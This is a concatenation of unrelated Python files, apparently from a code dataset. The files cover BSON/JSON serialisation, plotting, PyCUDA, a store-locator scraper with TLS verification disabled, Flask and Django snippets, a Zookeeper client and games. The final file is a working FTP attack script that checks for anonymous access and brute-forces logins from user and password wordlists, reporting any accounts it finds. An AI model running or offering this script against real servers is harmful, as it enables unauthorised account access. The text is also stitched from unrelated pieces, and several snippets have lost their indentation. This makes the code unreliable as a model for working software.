    fields = json.loads(parsed_json_string)
    return fields
def asjson2(func):
    """Pass-through decorator that calls *func* unchanged.

    Improvement: the wrapper now carries the wrapped function's metadata
    (``__name__``, ``__doc__``) via ``functools.wraps`` so that routing /
    introspection on the decorated function still sees the original name.
    """
    import functools

    @functools.wraps(func)
    def _func(*args, **kwargs):
        return func(*args, **kwargs)
    return _func
def asjson(f):
    """Serialize *f* (or the result of calling *f*) to a JSON string.

    If *f* is callable, returns a wrapper that calls it and JSON-encodes the
    result; otherwise *f* itself is encoded immediately.  A bare ``Cursor``
    result is wrapped in ``{collection_name: cursor}`` before encoding.

    NOTE(review): uses ``f.func_code`` — Python 2 only (``__code__`` on
    Python 3); confirm the target interpreter.
    """
    # Handler to handle the result
    def _handler(ret):
        # We need to wrap cursor in dict if it is the only item
        if isinstance(ret, Cursor):
            ret = {ret.collection.name: ret}
        return dumps(ret)
    # If f is a function, we must return a callable function
    if hasattr(f, '__call__'):
        def _asjson(*args, **kwargs):
            # Get the functions code
            co = f.func_code
            # Check if the function has a kwargs argument.
            # We cannot just check the name because it could be anything
            # which means we have to check the flags. 0x08 is set if keywords is set
            varkeywords = co.co_flags & 0x08 > 0
            # If we do not have a kwargs arg we need to strip the passed in kwargs so it matches
            if not varkeywords:
                names = co.co_varnames
                _kwargs = {}
                for name in names:
                    if name in kwargs:
                        _kwargs[name] = kwargs[name]
                kwargs = _kwargs
            return _handler(f(*args, **kwargs))
        return _asjson
    else:  # Otherwise, just handle the result
        return _handler(f)
def obj_to_dict(obj):
    """Return ``obj.external()`` when the object exposes a callable
    ``external`` attribute; otherwise return *obj* unchanged."""
    external = getattr(obj, 'external', None)
    if external is not None and hasattr(external, '__call__'):
        return external()
    return obj
def dumps(obj, *args, **kwargs):
    """Helper function that wraps :class:`json.dumps`.

    Recursive function that handles all BSON types including
    :class:`~bson.binary.Binary` and :class:`~bson.code.Code`.

    Extra positional/keyword arguments are forwarded to ``json.dumps``.

    Raises:
        Exception: when no JSON library could be imported (``json_lib`` False).
    """
    if not json_lib:
        raise Exception("No json library available")
    return json.dumps(_json_convert(obj), *args, **kwargs)
def _json_convert(obj):
    """Recursive helper method that converts BSON types so they can be
    converted into json.

    Mapping-like objects are converted key-by-key; everything else is passed
    to :func:`default`, falling back to the object itself when ``default``
    does not recognize the type.
    """
    # Filters on external
    obj = obj_to_dict(obj)
    if hasattr(obj, 'iteritems') or hasattr(obj, 'items'):  # PY2 / PY3
        # Bug fix: the original always called obj.iteritems(), which does
        # not exist on Python 3 dicts even though the guard above accepted
        # them via hasattr(obj, 'items').
        items = obj.iteritems() if hasattr(obj, 'iteritems') else obj.items()
        return dict((k, _json_convert(v)) for k, v in items)
    try:
        return default(obj)
    except TypeError:
        return obj
def default(obj):
    """Convert a single BSON-specific value to a JSON-serializable form.

    Mirrors MongoDB Extended JSON for most types.  Raises ``TypeError`` for
    unrecognized types so ``_json_convert`` can fall back to returning the
    object unchanged.
    """
    if isinstance(obj, ObjectId):
        return str(obj)  # Modified to return str(obj) instead of {$oid: str(obj)}
    if isinstance(obj, Cursor):  # If we have a cursor, convert every item
        return list(_json_convert(v) for v in obj)
    if isinstance(obj, DBRef):
        return _json_convert(obj.as_doc())
    if isinstance(obj, datetime.datetime):
        # TODO share this code w/ bson.py?
        if obj.utcoffset() is not None:
            # Normalize aware datetimes to UTC before taking the timestamp.
            obj = obj - obj.utcoffset()
        # Milliseconds since the Unix epoch, as Extended JSON expects.
        millis = int(calendar.timegm(obj.timetuple()) * 1000 +
                     obj.microsecond / 1000)
        return {"$date": millis}
    if isinstance(obj, RE_TYPE):
        # Translate Python regex flags into the MongoDB $options string.
        flags = ""
        if obj.flags & re.IGNORECASE:
            flags += "i"
        if obj.flags & re.LOCALE:
            flags += "l"
        if obj.flags & re.MULTILINE:
            flags += "m"
        if obj.flags & re.DOTALL:
            flags += "s"
        if obj.flags & re.UNICODE:
            flags += "u"
        if obj.flags & re.VERBOSE:
            flags += "x"
        return {"$regex": obj.pattern,
                "$options": flags}
    if isinstance(obj, MinKey):
        return {"$minKey": 1}
    if isinstance(obj, MaxKey):
        return {"$maxKey": 1}
    if isinstance(obj, Timestamp):
        return {"t": obj.time, "i": obj.inc}
    if isinstance(obj, Code):
        return {'$code': "%s" % obj, '$scope': obj.scope}
    if isinstance(obj, Binary):
        return {'$binary': base64.b64encode(obj).decode(),
                '$type': "%02x" % obj.subtype}
    if PY3 and isinstance(obj, binary_type):
        # On Python 3, raw bytes are emitted as generic (subtype 00) binary.
        return {'$binary': base64.b64encode(obj).decode(),
                '$type': "00"}
    if bson.has_uuid() and isinstance(obj, bson.uuid.UUID):
        return {"$uuid": obj.hex}
    raise TypeError("%r is not JSON serializable" % obj)
# test for git
# second comment
|
"""
Write a python lambda expression for calculating sum of two numbers and find out whether the sum is divisible by 10 or not.
Test your code by using the given sample inputs.
Verify your code by using the 2nd sample input(highlighted) given below:
+--------------+---------------------+
| Sample Input | Expected Output |
+--------------+---------------------+
| num1 = 5 | Not Divisible by 10 |
| num2 = 10 | |
+--------------+---------------------+
| num1 = 20 | |
| num2 = 30 | |
+--------------+---------------------+
"""
#PF-Exer-40
#This verification is based on string match.
num1=20
num2=30
div = lambda x,y:x+y
if(div(num1,num2)%10)==0:
print("Divisible by 10")
else:
print("Not Divisible by 10")
|
from flask import Blueprint

# Blueprint named 'xup'; view functions are registered on it elsewhere.
bp = Blueprint('xup', __name__)
# Least Square Sample
# ========================================
# [] File Name : ls_sample.py
#
# [] Creation Date : December 2017
#
# [] Created By : Ali Gholami (aligholami7596@gmail.com)
# ========================================
#
import matplotlib.pyplot as plt
import numpy as numpy
# Sample (x, y) observations that every candidate line is scored against.
dataset = numpy.array([[3,5],[5,3],[8,4],[3,1],[6,4],[5,4],[7,5],[8,3]])
# Candidate line parameters: slope_list[i] and constant_list[i] together
# describe the hypothesis y = slope*x + constant named in plot_titles[i].
slope_list = [5, 3, 6, 6, 3, 4]
constant_list = [6, 1, 4, 8, 4, 7]
# Human-readable labels for the hypotheses, used as subplot titles.
plot_titles = [
    'y = 5x + 6',
    'y = 3x + 1',
    'y = 6x + 4',
    'y = 6x + 8',
    'y = 3x + 4',
    'y = 4x + 7'
]
# ======================================== #
# ========== Least Square Error ========== #
# ======================================== #
def computeErrorForLineGivenPoints(b, m, coordinates):
    """Mean squared error of the line y = m*x + b over the given points.

    Each element of *coordinates* is an (x, y) pair; the result is the
    average of the squared vertical residuals.
    """
    residuals = [(point[1] - (m * point[0] + b)) ** 2 for point in coordinates]
    return sum(residuals) / float(len(coordinates))
# ======================================== #
# ============ Test with data ============ #
# ======================================== #
errorlist = []
for i in range(0, 6):
    # Bug fix: computeErrorForLineGivenPoints is (b, m, coordinates) with the
    # line y = m*x + b, so the intercept must be passed first and the slope
    # second.  The original call had them swapped, scoring y = 6x + 5 for the
    # hypothesis labelled "y = 5x + 6", etc.
    errorlist.append(computeErrorForLineGivenPoints(constant_list[i], slope_list[i], dataset))
    print("Hypothesis " + plot_titles[i] + " error: ")
    print(errorlist[i])
# ======================================== #
# ============ Plot the result =========== #
# ======================================== #
fig = plt.figure()
fig.suptitle('Least Square Errors', fontsize=10, fontweight='bold')
for i in range(1, 7):
    ax = fig.add_subplot(3, 2, i)
    ax.title.set_text(plot_titles[i-1])
    # Scatter of the raw observations.
    ax.scatter(dataset[:,0],dataset[:,1])
    errorLabel = "Error = "
    ax.text(0.95, 0.01, errorLabel + str(errorlist[i-1]),
            verticalalignment='bottom', horizontalalignment='right',
            transform=ax.transAxes,
            color='green', fontsize=12)
    # Bug fix: draw the hypothesis line y = slope*x + constant over the x
    # column; the original divided by the slope and passed the whole
    # two-column array as the x data.
    plt.plot(dataset[:, 0], slope_list[i-1] * dataset[:, 0] + constant_list[i-1])
plt.show()
# -*- coding: utf-8 -*-
"""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void dot_v_v(float *v1, float *v2,float* ret)
{
*ret = v1[X]*v2[X] + v1[Y]*v2[Y] + v1[Z]*v2[Z];
}
"""
import numpy as np
import pycuda.driver as drv
import pycuda.autoinit
from pycuda.compiler import SourceModule
# Compile the CUDA source at import time.  dot_v_v is the device-side inner
# product of two 3-component vectors; dot_helper is the launchable kernel
# wrapper around it.
mod = SourceModule("""
#define X 0
#define Y 1
#define Z 2
__device__ __forceinline__ void dot_v_v(float *v1, float *v2,float* ret)
{
*ret = v1[X]*v2[X] + v1[Y]*v2[Y] + v1[Z]*v2[Z];
}
__global__ void dot_helper(float *v1, float *v2,float* ret){
dot_v_v(v1, v2, ret);
}
""")
# Handle to the compiled kernel, used by the Python wrapper below.
f = mod.get_function("dot_helper")
def dot_v_v(v1: np.ndarray, v2: np.ndarray, result: np.ndarray) -> None:
    """
    Compute result = v1 · v2 (inner product) on the GPU.

    Parameters
    ----------
    v1 : 3-component float vector
    v2 : 3-component float vector
    result : single-element ndarray that receives the dot product
             (written in place by the kernel)

    Returns
    -------
    None; the value is stored into ``result``.
    """
    # Single-thread launch: one block of one thread computes the product.
    f(drv.In(v1), drv.In(v2), drv.Out(result), block=(1, 1, 1), grid=(1, 1))
|
"""
author: Lily
date : 2018-08-29
QQ : 339600718
冰雪皇后 Dairy Queen DairyQueen-s
抓取思路:改变参数(城市,关键字)获取不同城市的数据,各种关键字搜索的结果不一样,最后需要去重复
注意:1.有些城市是没有数据,是空,例如北京没有数据,但北京是有很多店的,官网数据不全
2.输入的城市和关键字是省份的话也可以抓到数据,但是不全
3.关键字不通,搜到的数据不一样,city=上海市时,关键字用上海市只搜出来27家,但是用上海搜出来51家。
4.需要用其他不同的关键字搜索,比如:"路","号","店"," 区"
"""
import requests
import json
import csv
import datetime
import re
# Helper that POSTs to a URL and returns the response body as text.
def download(url, data, headers=None):
    """Issue a POST request and return the decoded response body.

    NOTE(review): ``verify=False`` disables TLS certificate verification —
    confirm this is intentional for the scrape target.
    """
    html = requests.post(url=url, data=data, headers=headers, verify=False)
    html = html.text
    return html
# 用Fiddler检测到的headers
header = {
"Accept-Encoding": "gzip",
"User-Agent": "Mozilla/5.0 (Linux; Android 5.1.1; vivo X7 Build/LMY47V) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/39.0.0.0 Mobile Safari/537.36 MicroMessenger/6.7.2.1340(0x26070237) NetType/WIFI Language/zh_CN"
}
# 用fiddler检测到的url
url = "http://www.dairyqueen.com.cn/store.php?action=search"
# 用于查询的关键字
keyword = ["路", "号", "店", "区"]
# 为了查重,将店名存储于name
name = []
# 为了查重,将地址存储于address
address = []
# sku+时间戳命名文件
filename = "DairyQueen-s"+ re.sub(r'[^0-9]', '', str(datetime.datetime.now()))+'.csv'
# 创建文件,准备写入数据
f = open(filename, 'w', encoding='utf-8')
f.write("name,address,lat,lng"+"\n")
# 打开citys文件,准备读取city list
with open('citys.csv', 'r', encoding='utf-8') as csvfile:
# 获取citys文件内容
reader = csv.reader(csvfile)
# 按行读取citys文件
for row in reader:
# 由于每行是一个list,第一列就是list[0],取到citys的第一列的具体值
city = str(row[0])
# 关键字里面加上城市的前两个字
keyword.append(city[:2])
# 便利每个关键字查询
for kw in keyword:
# 提交的参数
data = {"q": kw, "city_name": city}
# 加载数据页面
html = download(url, data, header)
# 将数据json化
store = json.loads(html)
# 为了防止程序异常停止,使用try...except...
try:
# 有些城市没有数据,根据lists判断,如果有lists才会继续抓取
if store["lists"]:
# 遍历lists里面的每一条store
for s in store["lists"]:
# 判断重复,如果店面和地址都已经抓过了,就不再抓取
if s["name"] not in name or s["address"] not in address:
# 遍历每条数据的每个属性
for k, v in s.items():
# 写入每个值
print(k ,v)
f.write(v + ",")
# 将写过的name 添加到name 数组里
if k == "name":
name.append(v)
# 将写过的Address添加到address数组里
if k == "address":
address.append(v)
# 写完一条数据后换行
f.write('\n')
except:
# 出现异常时输出“无数据”
print("无数据")
# 将用过的city参数清除,待查询下一个城市使用
keyword.remove(city[:2])
# 关闭文件
f.close()
|
from flask_restful import Resource
from auth.manager import refresh_access_token
from flask_jwt_extended import jwt_required
class RefreshAccessToken(Resource):
    """POST endpoint exchanging a valid refresh token for a new access token."""

    # Only refresh tokens (not access tokens) may call this endpoint.
    @jwt_required(refresh=True)
    def post(self):
        return refresh_access_token()
|
from __future__ import unicode_literals
from django.db import models
from django.forms import ModelForm
class Upload(models.Model):
    """Model storing a single uploaded image and its upload time."""
    # Uploaded image file, stored under MEDIA_ROOT/images/.
    image = models.ImageField("Image", upload_to="images/")
    # Set automatically when the row is first created.
    upload_date=models.DateTimeField(auto_now_add =True)
    # NOTE(review): class-level constant shared by all instances — presumably
    # a placeholder, not a real per-row UUID field; confirm intent.
    uuid = 123
# FileUpload form class.
class UploadForm(ModelForm):
    """ModelForm exposing every field of the Upload model."""
    class Meta:
        model = Upload
        fields = '__all__'
#!/usr/bin/env python3
"""
convert Gemini data to HDF5 .h5
For clarity, the user must provide a config.nml for the original raw data.
"""
from pathlib import Path
import argparse
import gemini3d.read as read
import gemini3d.write as write
LSP = 7  # presumably the number of plasma species in Gemini — confirm; unused in this view
CLVL = 6  # presumably an output compression level — confirm; unused in this view
def cli():
    """Convert Gemini raw ``.dat`` output files to HDF5 (.h5) or NetCDF (.nc).

    Reads the simulation config (config.nml) and, when present, the grid
    from the input directory, then converts every matching data file,
    writing results next to the input or into ``--outdir``.
    """
    p = argparse.ArgumentParser()
    p.add_argument("format", help="file format", choices=["h5", "nc"])
    p.add_argument("indir", help="Gemini .dat file directory")
    p.add_argument("-i", "--intype", help="type of input file [.dat]", default=".dat")
    p.add_argument("-o", "--outdir", help="directory to write HDF5 files")
    P = p.parse_args()

    indir = Path(P.indir).expanduser()
    # Output directory: explicit flag wins; otherwise write alongside input.
    if P.outdir:
        outdir = Path(P.outdir).expanduser()
    elif indir.is_file():
        outdir = indir.parent
    elif indir.is_dir():
        outdir = indir
    else:
        raise FileNotFoundError(indir)
    # A single file converts just that file; a directory converts every
    # file carrying the requested input suffix.
    if indir.is_file():
        infiles = [indir]
        indir = indir.parent
    elif indir.is_dir():
        infiles = sorted(indir.glob(f"*{P.intype}"))
    else:
        raise FileNotFoundError(indir)
    if not infiles:
        raise FileNotFoundError(f"no {P.intype} files to convert in {indir}")
    cfg = read.config(indir)
    if "flagoutput" not in cfg:
        raise LookupError(f"need to specify flagoutput in {indir}/config.nml")
    # The grid file may be absent; conversion proceeds without it.
    try:
        xg = read.grid(indir, file_format=P.intype)
    except FileNotFoundError:
        xg = None
    for infile in infiles:
        # Skip auxiliary files that are not time-step data.
        if infile.name in {"simsize", "simgrid", "initial_conditions"}:
            continue
        outfile = outdir / (f"{infile.stem}.{P.format}")
        print(infile, "=>", outfile)
        dat = read.data(infile, file_format=P.intype, cfg=cfg, xg=xg)
        write.data(outfile, dat, file_format=P.format, xg=xg)

if __name__ == "__main__":
    cli()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
import re
import csv
#import numpy as np
#import pandas as pd
def read_data(fname):
    """Read a 'Time, s; Heat flow, Watt' file into two parallel lists.

    The header line is skipped; every remaining line containing '; ' is
    split on ';' and parsed as (time, heat flow) floats.

    Returns:
        (mT, mHf): lists of times and heat-flow values.
    """
    mT = []
    mHf = []
    # Improvement: the original iterated over open(fname) without ever
    # closing the file; the with-statement guarantees closure.
    with open(fname, 'r') as fh:
        for line in fh:
            s = line.rstrip('\r\n')
            if 'Time, s; Heat flow, Watt' in s:
                continue
            if '; ' in s:
                dat = s.split(';')
                mT.append(float(dat[0]))
                mHf.append(float(dat[1]))
    return mT, mHf
def find_near(t1, Hf1, mt, mHf):
    """Find the sample in (mt, mHf) whose time is closest to t1.

    Returns (time, heat_flow) of the nearest sample when it lies within
    1000 s of t1, otherwise (None, None).  Hf1 is accepted for symmetry
    with the caller but is not used.
    """
    nearest_t, nearest_Hf = min(zip(mt, mHf), key=lambda pair: abs(pair[0] - t1))
    if abs(nearest_t - t1) < 1000.0:
        return nearest_t, nearest_Hf
    return None, None
# Load the two measurement series named on the command line.
mt1, mHf1 = read_data(sys.argv[1])
mt2, mHf2 = read_data(sys.argv[2])
#print mt2, mHf2
mt = []
mHf = []
# For each sample of series 1, find the nearest-in-time sample of series 2
# and record the averaged time and the heat-flow difference.
for t1, Hf1 in zip(mt1, mHf1):
#    print t1, Hf1
    t2, Hf2 = find_near(t1, Hf1, mt2, mHf2)
#    print ' *** ', t2, Hf2
    if not t2 is None:
#        print ' add ', t2, Hf2
        mt.append((t1+t2)/2)
        mHf.append(Hf1-Hf2)
# Emit the differenced series in the same 'time; value' format as the input.
print('Time, s; Heat flow, Watt')
for i in range(len(mt)):
    print('%.11f; %.14e' % (mt[i], mHf[i] ))
|
#!/usr/bin/python
# Orthanc - A Lightweight, RESTful DICOM Store
# Copyright (C) 2012-2016 Sebastien Jodogne, Medical Physics
# Department, University Hospital of Liege, Belgium
# Copyright (C) 2017-2020 Osimis S.A., Belgium
#
# This program is free software: you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation, either version 3 of
# the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program. If not, see
# <http://www.gnu.org/licenses/>.
import re
import sys
import subprocess
import urllib2
# NOTE(review): Python 2 script (``urllib2``); Python 3 would need
# ``urllib.request`` and bytes-aware regex handling.
if len(sys.argv) <= 2:
    # Need at least a macro name and one certificate URL.
    print('Download a set of CA certificates, convert them to PEM, then format them as a C macro')
    print('Usage: %s [Macro] [Certificate1] <Certificate2>...' % sys.argv[0])
    print('')
    print('Example: %s BITBUCKET_CERTIFICATES https://www.digicert.com/CACerts/DigiCertHighAssuranceEVRootCA.crt' % sys.argv[0])
    print('')
    sys.exit(-1)
MACRO = sys.argv[1]
# Emit the macro header; each certificate is appended as continued lines.
sys.stdout.write('#define %s ' % MACRO)
for url in sys.argv[2:]:
    # Download the certificate from the CA authority, in the DES format
    des = urllib2.urlopen(url).read()
    # Convert DES to PEM
    p = subprocess.Popen([ 'openssl', 'x509', '-inform', 'DES', '-outform', 'PEM' ],
                         stdin = subprocess.PIPE,
                         stdout = subprocess.PIPE)
    pem = p.communicate(input = des)[0]
    pem = re.sub(r'\r', '', pem)  # Remove any carriage return
    pem = re.sub(r'\\', r'\\\\', pem)  # Escape any backslash
    pem = re.sub(r'"', r'\\"', pem)  # Escape any quote
    # Write the PEM data into the macro, one quoted line per PEM line,
    # each ending with a C line-continuation backslash.
    for line in pem.split('\n'):
        sys.stdout.write(' \\\n')
        sys.stdout.write('"%s\\n" ' % line)
sys.stdout.write('\n')
sys.stderr.write('Done!\n')
|
from sklearn import svm
from numpy import genfromtxt
import matplotlib.pyplot as plt
def read_dataset(filePath, delimiter=','):
    """Load a numeric array from a delimited text file via numpy."""
    data = genfromtxt(filePath, delimiter=delimiter)
    return data
# use the same dataset
tr_data = read_dataset('tr_server_data.csv')
# One-class SVM for anomaly detection; nu bounds the outlier fraction.
clf = svm.OneClassSVM(nu=0.05, kernel="rbf", gamma=0.1)
clf.fit(tr_data)
pred = clf.predict(tr_data)
# inliers are labeled 1, outliers are labeled -1
normal = tr_data[pred == 1]
abnormal = tr_data[pred == -1]
# Scatter the two columns: blue crosses for inliers, red dots for outliers.
plt.figure()
plt.plot(normal[:,0],normal[:,1],'bx')
plt.plot(abnormal[:,0],abnormal[:,1],'ro')
plt.xlabel('Latency (ms)')
plt.ylabel('Throughput (mb/s)')
plt.show()
|
import serial, time
from flask import Flask, flash, redirect, render_template, request, url_for
app = Flask(__name__)
# Needed for flash() messages (session cookie signing).
app.secret_key = 'super_secret_key'

@app.route('/')
def hello_world():
    """Plain-text index route."""
    return "Hello World!"

@app.route('/hello')
@app.route('/hello/<name>')
def hello(name = None):
    """Render the hello template, optionally greeting *name*."""
    return render_template('hello.html', name=name)
@app.route('/send', methods = ["GET", "POST"])
def send():
    """Forward the posted 'code' string to the Arduino over serial.

    GET renders the form; POST writes the code to the serial port.  AJAX
    posts get a plain-text reply, normal form posts get a flash message and
    a redirect back to the form.

    NOTE(review): ``request.is_xhr`` was removed in Werkzeug 2.0 — confirm
    the pinned Flask/Werkzeug versions still provide it.
    """
    if request.method == 'POST':
        code = request.form['code']
        if request.is_xhr:
            try:
                # ``arduino`` is the module-level serial port opened in __main__.
                arduino.write(code.encode('ASCII'))
                return "You've sent %s" % code
            except serial.serialutil.SerialException:
                return "Error while communicating with Arduino"
        else:
            try:
                arduino.write(code.encode('ASCII'))
                flash("You've sent %s" % code)
            except serial.serialutil.SerialException:
                flash("Error while communicating with Arduino")
            return redirect(url_for('send'))
    else:
        return render_template('send.html')
if __name__ == '__main__':
    app.debug = True
    # Open the Arduino serial port before serving requests.
    # NOTE(review): macOS-style device path; adjust for the deployment host.
    arduino = serial.Serial('/dev/tty.usbmodem1411', 9600, timeout=.1)
    app.run()
#Test Python Program
import numpy as np
import sys
class Tic_Tac_Board(object):
    ''' 3x3 numpy-backed board for playing tic tac toe.

    Cells hold player1_value (+1), player2_value (-1), or default_val
    (empty, 0 by default).'''

    def __init__(self, player1, player2, default_val=0):
        # 3x3 integer board; every cell is reset to the "empty" sentinel.
        self.board = (np.arange(9).reshape(3,3))
        self.default_val= default_val
        self.board[:] = self.default_val
        self.player1 = player1          # display symbol for player 1 (e.g. "X")
        self.player1_value = 1          # value stored on the board for player 1
        self.player2 = player2          # display symbol for player 2 (e.g. "O")
        self.player2_value = -1         # value stored on the board for player 2

    def translate_player_symbol(self, player_symbol):
        '''maps a display symbol to its stored board value; any symbol
        other than player1's maps to player 2's value'''
        if player_symbol == self.player1:
            return self.player1_value
        else:
            return self.player2_value

    def player_move(self, row, column, player_symbol):
        '''assigns a move to a position on the board '''
        if self.check_space(row, column):
            self.board[row, column] = self.translate_player_symbol(player_symbol)
        else:
            raise ValueError("Position already taken")

    def copy_board_and_move(self, row, column, player_symbol):
        '''assigns a move to a position on the board and returns a new copy of the board'''
        new_board = Tic_Tac_Board(self.player1, self.player2, self.default_val)
        new_board.board = np.copy(self.board)
        new_board.player_move(row, column, player_symbol)
        return new_board

    def check_space(self, row, column):
        '''checks if a board position is empty'''
        if self.board[row, column] != self.default_val:
            return False
        return True

    def check_moves(self):
        ''' returns list of allowable moves (empty spaces)'''
        # nonzero yields (rows, cols); transpose + ravel interleaves them as
        # r0, c0, r1, c1, ... which the zip below pairs back up into (r, c).
        children = np.ravel(np.transpose(np.nonzero(self.board == self.default_val)))
        return list(zip(list(children[::2]), list(children[1:][::2])))

    def check_win(self, player_symbol):
        ''' checks if the given player has won; returns that player's board
        value on a win and 0 otherwise '''
        player_value = self.translate_player_symbol(player_symbol)
        # Anti-diagonal is tested once up front; each row/column and the
        # main diagonal (trace) are tested inside the loop.
        if np.sum([self.board[0,2], self.board[1,1], self.board[2,0]]) == (3*player_value):
            return player_value
        for i in range(0,3):
            if np.sum(self.board[i,:])== (3*player_value) or np.sum(self.board[:,i])== (3*player_value):
                return player_value
            elif np.trace(self.board) == 3*player_value:
                return player_value
        return 0

    def game_over(self):
        '''checks if the game has ended (a win for either player or a full board)'''
        # Bug fix: check_win() takes a player *symbol* and translates it
        # itself.  The original passed the numeric board values, which
        # translate_player_symbol mapped to player 2 in both calls, so a
        # player 1 win was never detected here.
        if self.check_win(self.player1) == self.player1_value:
            #print("Player 1 Wins")
            return True
        elif self.check_win(self.player2) == self.player2_value:
            #print("Player 2 Wins")
            return True
        elif len(self.board[self.board==0]) == 0:
            # NOTE(review): draw test hard-codes 0 rather than default_val.
            #print("Game Over - No one wins")
            return True
        else:
            return False

    def prompt_move(self):
        ''' returns 1 when the mark counts balance (player 1 to move), else 0 '''
        if np.sum(self.board) == 0:
            return 1
        else:
            return 0

    def show_board(self):
        '''prints the board using the players' display symbols, one row per line'''
        print("\nTic Tac Toe Game\n")
        for j in range(0,3):
            for k in range(0,3):
                if self.board[j, k] == self.player1_value:
                    sys.stdout.write(self.player1)
                elif self.board[j, k] == self.player2_value:
                    sys.stdout.write(self.player2)
                else:
                    sys.stdout.write('_')
            sys.stdout.write('\n')
        sys.stdout.write('\n')
if __name__ == '__main__':
    # Smoke-test drive of the board API.
    new_game = Tic_Tac_Board("X", "O")
    # NOTE(review): check_win expects a player symbol; passing 1 makes
    # translate_player_symbol fall through to player 2 — confirm intent.
    new_game.check_win(1)
    new_game.prompt_move()
    print(new_game.check_moves())
    new_game.show_board()
    new_game.player_move(1,1, "X")
    new_game.show_board()
    new_game.player_move(0,0,"O")
    new_game.show_board()
    # NOTE(review): (1,1) was already taken above, so this raises
    # ValueError("Position already taken") and the final check_moves()
    # never runs — confirm whether this crash is intentional.
    new_game.player_move(1,1,"X")
    new_game.check_moves()
def mutate_string(string, position, character):
    """Return a copy of *string* with the character at *position* replaced
    by *character* (strings are immutable, so a new one is built)."""
    chars = list(string)
    chars[position] = character
    return "".join(chars)
string = input()
i, c = input().split()
# Bug fix: the original passed the built-in ``str`` type instead of the
# ``string`` variable read above, which raises a TypeError inside list().
print(mutate_string(string, int(i), c))
|
"""Zookeeper admin interface.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import socket
import logging
_LOGGER = logging.getLogger(__name__)
def netcat(hostname, port, command):
    """Send 4letter netcat to Zookeeper control port.

    Connects to (hostname, port), sends *command* (bytes), half-closes the
    write side, then reads the full reply and returns it decoded as text.

    Improvement: the socket is now closed in a ``finally`` block so it is
    not leaked when connect/send/recv raises.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        sock.connect((hostname, port))
        sock.sendall(command)
        # Signal EOF to the server so it replies and closes.
        sock.shutdown(socket.SHUT_WR)
        data = []
        while True:
            chunk = sock.recv(1024)
            if not chunk:
                break
            data.append(chunk)
    finally:
        sock.close()
    return b''.join(data).decode()
# pylint does not like "ok" as a function name.
# pylint: disable=C0103
def ok(hostname, port):
"""Send ruok command to Zookeeper instance.
"""
try:
return netcat(hostname, port, b'ruok\n') == 'imok'
except socket.error:
return False
def stat(hostname, port):
    """Fetch the output of the Zookeeper 'stat' 4-letter command."""
    command = b'stat\n'
    return netcat(hostname, port, command)
from itertools import cycle, islice
def chessboard(s):
    """Render an n-by-m checkerboard of '*' and '.' characters.

    *s* is a string of two whitespace-separated integers "n m" (rows,
    columns).  Row 0 starts with '*', row 1 with '.', alternating.  Either
    dimension being zero yields the empty string.
    """
    n, m = (int(a) for a in s.split())
    if not n or not m:
        return ''
    even_row = ''.join(islice(cycle('*.'), m))
    odd_row = ''.join(islice(cycle('.*'), m))
    return '\n'.join(islice(cycle((even_row, odd_row)), n))
|
#!/usr/bin/python3
import sys
import ftplib
def directory_listing(ftp_connection):
    """Print the listing of the FTP connection's current working directory."""
    pwd = ftp_connection.pwd()
    entries = []
    ftp_connection.dir(pwd, entries.append)
    print("[.] Content of Directory " + pwd)
    for entry in entries:
        print(entry)
    print("\n")
    return
def anonFTP(hostname):
    """Check whether *hostname* allows anonymous FTP login.

    On success, prints a banner, lists the current directory, and returns
    True; on any FTP/socket failure prints a notice and returns False.
    """
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login('anonymous', 'test@test.com')
        print("[+] " + hostname + " is an anonymous FTP server")
        directory_listing(ftp)
        ftp.quit()
        return True
    except ftplib.all_errors:
        # Bug fix: report the ``hostname`` argument, not the module-level
        # ``ftpsvr`` global the original referenced.  Also narrowed the bare
        # except so e.g. KeyboardInterrupt is no longer swallowed.
        print("[-] " + hostname + " is either offline or not an FTP server")
        return False
def ftp_brute(hostname, user, password):
    """Attempt one FTP login with the given credentials.

    On success, prints the found account, lists the directory, and returns
    True; any FTP/socket failure returns False.
    """
    try:
        ftp = ftplib.FTP(hostname)
        ftp.login(user, password)
        print("[+] FOUND ACCOUNT User: " + user + " Password: " + password)
        directory_listing(ftp)
        ftp.quit()
        return True
    except ftplib.all_errors:
        # Narrowed from a bare except so KeyboardInterrupt and programming
        # errors are no longer silently swallowed during long runs.
        return False
# Target host from the command line.
ftpsvr = sys.argv[1]
print(ftpsvr + ": Checking anonymous FTP server status")
ftp_result = anonFTP(ftpsvr)
# Brute forcing
print("\n" + ftpsvr + ": Brute forcing FTP server...")
# Improvement: both wordlists are now opened with ``with`` so the file
# handles are closed; the original reopened "passlist" on every outer
# iteration and never closed any of the handles.
with open("userlist", "r") as userlistfile:
    for user in userlistfile.readlines():
        # strip trailing new lines
        user = user.rstrip()
        with open("passlist", "r") as passlistfile:
            for password in passlistfile.readlines():
                password = password.rstrip()
                print("[.] Trying user: " + user + " password: " + password)
                ftp_brute(ftpsvr, user, password)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.